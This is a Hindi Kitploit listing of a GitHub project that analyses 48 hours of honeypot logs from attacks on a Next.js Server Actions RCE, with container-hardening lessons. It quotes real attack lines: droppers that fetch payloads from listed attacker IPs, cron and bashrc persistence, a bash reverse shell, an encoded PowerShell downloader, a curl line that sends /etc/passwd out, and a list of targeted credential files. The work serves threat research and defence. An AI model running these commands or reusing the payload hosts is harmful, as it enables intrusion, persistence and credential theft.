Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66478 — CVE-2025-66478 (Next.js Server Actions RCE) के वास्तविक दुनिया के हमले के लॉग विश्लेषण, मैलवेयर नमूनों, हमलावर IP ट्रैकिंग, और कंटेनर सुरक्षा सख्तीकरण के सबक के साथ। | Kitploit
उपकरण/GitHubGitHub/exptechtw/cve-2025-66478
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकमालवेयर विश्लेषणखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

CVE-2025-66478 (Next.js Server Actions RCE) के वास्तविक दुनिया के हमले के लॉग विश्लेषण, मैलवेयर नमूनों, हमलावर IP ट्रैकिंग, और कंटेनर सुरक्षा सख्तीकरण के सबक के साथ।

259 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-66478 - Next.js सर्वर कार्रवाइयाँ RCE शोषण वास्तविक हमला लॉग विश्लेषण

अवलोकन

यह परियोजना इंटरनेट पर उजागर Next.js 15.1.2 एप्लिकेशन (Docker कंटेनर में चल रहा) द्वारा रिकॉर्ड किए गए वास्तविक हमला लॉग एकत्र करती है। ये लॉग दिखाते हैं कि CVE-2025-66478 भेद्यता का बड़े पैमाने पर स्वचालित हमला उपकरणों द्वारा स्कैनिंग और शोषण किया जा रहा है।

रिकॉर्ड समय सीमा: 2025-12-04 ~ 2025-12-06 (लगभग 48 घंटे)

पर्यावरण जानकारी:

  • फ्रेमवर्क: Next.js 15.1.2
  • रनटाइम: Bun v1.2.20
  • कंटेनर: Docker (Alpine Linux)
  • समय क्षेत्र: Asia/Taipei

हमला प्रकार सांख्यिकी

1. दुर्भावनापूर्ण प्रोग्राम डाउनलोड और निष्पादन (Dropper/Downloader)

हमलावर भेद्यता के माध्यम से दुर्भावनापूर्ण प्रोग्राम डाउनलोड और निष्पादित करने के निर्देश देने का प्रयास करते हैं।

हमला स्रोत IPदुर्भावनापूर्ण पेलोड URLविवरण
216.158.232.43http://216.158.232.43:12000/sex.shबॉटनेट/माइनिंग प्रोग्राम
38.207.161.212http://38.207.161.212/agentदुर्भावनापूर्ण एजेंट प्रोग्राम
43.156.63.124http://43.156.63.124/tsdक्रॉन बैकडोर डालना
154.38.121.219res.qiqigece.top/nginx3nginx का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम
47.79.42.91iot.632313373.xyz/nz.shIoT बॉटनेट स्क्रिप्ट
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shमाइनिंग/बैकडोर प्रोग्राम
103.135.101.15http://103.135.101.15/wocaosinm.shदुर्भावनापूर्ण स्क्रिप्ट
38.12.24.231http://38.12.24.231/kworkerकर्नेल वर्कर का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम
128.199.194.97http://128.199.194.97:9001/setup2.shआरंभीकरण स्क्रिप्ट

हमला निर्देश उदाहरण

root@kitploit:~
# विशिष्ट ड्रॉपर हमला
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# क्रॉन स्थायित्व बैकडोर डालना
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# जटिल स्थायित्व हमला (एकाधिक डाउनलोड विधियाँ + क्रॉन + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. रिवर्स शेल (Reverse Shell)

हमलावर इंटरैक्टिव एक्सेस प्राप्त करने के लिए रिवर्स शेल कनेक्शन स्थापित करने का प्रयास करते हैं।

root@kitploit:~
# बैश रिवर्स शेल
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell हमला (Windows के लिए गलत अनुमान)

हमलावर मानते हैं कि लक्ष्य Windows सिस्टम है और PowerShell निर्देश निष्पादित करने का प्रयास करते हैं।

root@kitploit:~
# Base64 एन्कोडेड दुर्भावनापूर्ण PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# डीकोड करने पर:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# भेद्यता पुष्टि के लिए गणितीय गणना
powershell -c "41*271"      # = 11111 (विशेषता कोड पुष्टि)
powershell -c "44225*41002" # = 1814113450

4. सूचना संग्रह (Information Gathering)

हमलावर बाद के हमलों के लिए सिस्टम जानकारी एकत्र करने का प्रयास करते हैं।

root@kitploit:~
# सिस्टम जानकारी एकत्र करना और बाहर भेजना
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. क्रेडेंशियल चोरी (Credential Harvesting)

हमलावर विभिन्न संवेदनशील फ़ाइलों और क्रेडेंशियल्स को पढ़ने का प्रयास करते हैं।

पढ़ने का प्रयास किए गए संवेदनशील पथ

6. पर्यावरण चर रिसाव

भेद्यता के माध्यम से सफलतापूर्वक रिसाव किए गए कंटेनर पर्यावरण चर:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS बहिर्वाह (DNS Exfiltration)

हमलावर डेटा बाहर भेजने या भेद्यता की पुष्टि करने के लिए DNS क्वेरी का उपयोग करते हैं:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

हमला विफलता के कारण

अधिकांश हमले Alpine Linux कंटेनर की कम विशेषताओं के कारण विफल होते हैं:

गुम उपकरणप्रभाव
curlदुर्भावनापूर्ण पेलोड डाउनलोड करने में असमर्थ
bashबैश-विशिष्ट सिंटैक्स (जैसे रिवर्स शेल) निष्पादित करने में असमर्थ

हालांकि wget उपलब्ध है, लेकिन कुछ दुर्भावनापूर्ण स्क्रिप्ट आंतरिक रूप से curl या bash पर निर्भर करती हैं, जिससे निष्पादन विफल हो जाता है।


Base64 डीकोडिंग उदाहरण

लॉग में बड़ी मात्रा में Base64 एन्कोडेड डेटा शामिल है, यहाँ कुछ डीकोडिंग परिणाम हैं:

सिस्टम जानकारी रिसाव

root@kitploit:~
# digest: 'cm9vdAo='
डीकोड: root

# digest: 'dGVzdAo='
डीकोड: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
डीकोड: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
डीकोड: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

निर्देशिका सूची रिसाव

root@kitploit:~
# /tmp निर्देशिका सामग्री
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

डीकोड:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

हमला स्रोत IP सांख्यिकी

यहाँ रिकॉर्ड किए गए हमला स्रोत IP पतों की सूची है:


भेद्यता शोषण तकनीक (Attack Vectors)

सर्वर कार्रवाई कॉल

हमलावर अस्तित्वहीन सर्वर कार्रवाई को कॉल करने का प्रयास करते हैं:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

त्रुटि प्रतिक्रियाओं में सूचना रिसाव

हमलावर त्रुटि संदेशों में digest फ़ील्ड का उपयोग करके डेटा लीक करते हैं:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64 एन्कोडेड 'root'

शिक्षण बिंदु

1. कंटेनर सुरक्षा सर्वोत्तम अभ्यास

  • न्यूनतम छवि: कम विशेषताओं वाली आधार छवि (जैसे Alpine) का उपयोग करने से हमले की सतह कम होती है
  • अनावश्यक उपकरण हटाएँ: curl, bash, python जैसे दुरुपयोग किए जा सकने वाले उपकरण स्थापित न करें
  • केवल-पढ़ने के लिए फ़ाइल सिस्टम: कंटेनर को --read-only के साथ चलाएँ
  • गैर-root उपयोगकर्ता: एप्लिकेशन को अनविशेषाधिकार प्राप्त उपयोगकर्ता के रूप में चलाएँ

2. भेद्यता पैचिंग

  • Next.js को पैच किए गए संस्करण में अपग्रेड करें
  • सर्वर कार्रवाई के इनपुट को मान्य करें
  • संदिग्ध अनुरोधों को फ़िल्टर करने के लिए WAF नियम लागू करें

3. निगरानी और पहचान

  • असामान्य उपप्रक्रिया निष्पादन की निगरानी करें
  • नेटवर्क आउटबाउंड कनेक्शन अनुरोधों की निगरानी करें
  • संवेदनशील फ़ाइल एक्सेस प्रयासों की निगरानी करें

अस्वीकरण

यह परियोजना केवल सूचना सुरक्षा शिक्षा और अनुसंधान उद्देश्यों के लिए है। सभी रिकॉर्ड किए गए हमले अनुसंधान हनीपॉट के खिलाफ वास्तविक हमले के प्रयास हैं। कृपया इस जानकारी का उपयोग किसी भी अवैध उद्देश्य के लिए न करें।


दुर्भावनापूर्ण प्रोग्राम नमूने

इस परियोजना में हमला लॉग से निकाले गए और डाउनलोड किए गए वास्तविक दुर्भावनापूर्ण प्रोग्राम नमूने शामिल हैं, विस्तृत विश्लेषण के लिए देखें:

malware_samples/ANALYSIS.md

प्राप्त नमूने

हमला तकनीक सारांश

  1. nz.sh - Nezha मॉनिटरिंग एजेंट स्थापित करना, दूरस्थ पीड़ित होस्ट की निगरानी के लिए
  2. tsd.sh + tsd - एकाधिक स्थायित्व तंत्र बनाना (cron + systemd + rc.local)
  3. init.sh + agent - पूर्ण बैकडोर फ्रेमवर्क, बहु-सिस्टम समर्थन, स्वचालित पुनरारंभ, लॉग रिकॉर्डिंग

संबंधित संसाधन

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

लाइसेंस

MIT License

टूल डाउनलोड करें
श्रेणीपथ
क्लाउड क्रेडेंशियल/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH कुंजी/root/.ssh/id_rsa, /root/.ssh/config
Git क्रेडेंशियल/root/.git-credentials, /root/.gitconfig
कंटेनर/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
एप्लिकेशन/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
शेल इतिहास/root/.bash_history, /root/.zsh_history
क्लाउड उपकरण/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
सिस्टम सेटिंग/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
powershellWindows हमला अप्रभावी
pythonPython डाउनलोडर का उपयोग करने में असमर्थ
IP पतादेश/क्षेत्र (अनुमानित)हमला प्रकार
216.158.232.43संयुक्त राज्य अमेरिकाDropper
38.165.44.205संयुक्त राज्य अमेरिकाDropper
23.95.44.80संयुक्त राज्य अमेरिकाDropper
154.38.121.219हांगकांगमैलवेयर (nginx3)
38.207.161.212संयुक्त राज्य अमेरिकाएजेंट
43.156.63.124चीनक्रॉन बैकडोर
47.79.42.91चीन (Alibaba Cloud)IoT बॉटनेट
47.79.65.237चीन (Alibaba Cloud)माइनिंग प्रोग्राम
119.45.243.154चीन (Tencent Cloud)माइनिंग प्रोग्राम
144.22.210.54ब्राज़ीलDropper
217.60.249.228स्वीडनDropper
154.26.192.32संयुक्त राज्य अमेरिकारिवर्स शेल
156.234.209.103अज्ञातPowerShell पेलोड
38.60.212.106संयुक्त राज्य अमेरिकासूचना संग्रह
103.135.101.15वियतनामबॉटनेट
128.199.194.97सिंगापुर (DigitalOcean)सेटअप स्क्रिप्ट
38.12.24.231संयुक्त राज्य अमेरिकास्थायित्व दुर्भावनापूर्ण प्रोग्राम
फ़ाइलप्रकारआकारस्रोतखतरा स्तर
nz.shशेल स्क्रिप्ट931 Biot.632313373.xyzमध्यम
tsd.shशेल स्क्रिप्ट1.7 KB43.156.63.124उच्च
tsdELF 64-bit6.8 MB43.156.63.124उच्च
init.shशेल स्क्रिप्ट6.1 KBAWS S3गंभीर
agentELF 64-bit23.7 MBAWS S3गंभीर
Agtisx.exePE32+ (Windows)24.0 MBAWS S3गंभीर